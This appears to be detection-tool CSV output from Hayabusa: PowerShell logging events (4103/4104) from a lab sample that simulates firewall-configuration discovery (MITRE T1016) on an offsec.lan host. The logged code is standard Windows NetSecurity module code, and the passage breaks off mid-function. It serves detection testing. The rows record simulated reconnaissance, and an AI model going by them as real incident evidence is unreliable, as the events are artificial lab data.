[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetInterfaceTypeFilter"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallInterfaceTypeFilter</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""InterfaceType""> <Type PSType=""NetSecurity.InterfaceType""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetFirewallRuleFilterByInterfaceType"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallRule""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleFilterByInterfaceType"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""InterfaceType""> <Type PSType=""NetSecurity.InterfaceType""/> <CmdletParameterMetadata PSName=""InterfaceType""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.InterfaceType"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""Any"" Value=""0""/> <Value Name=""Wired"" Value=""1""/> <Value Name=""Wireless"" Value=""2""/> <Value Name=""RemoteAccess"" Value=""4""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 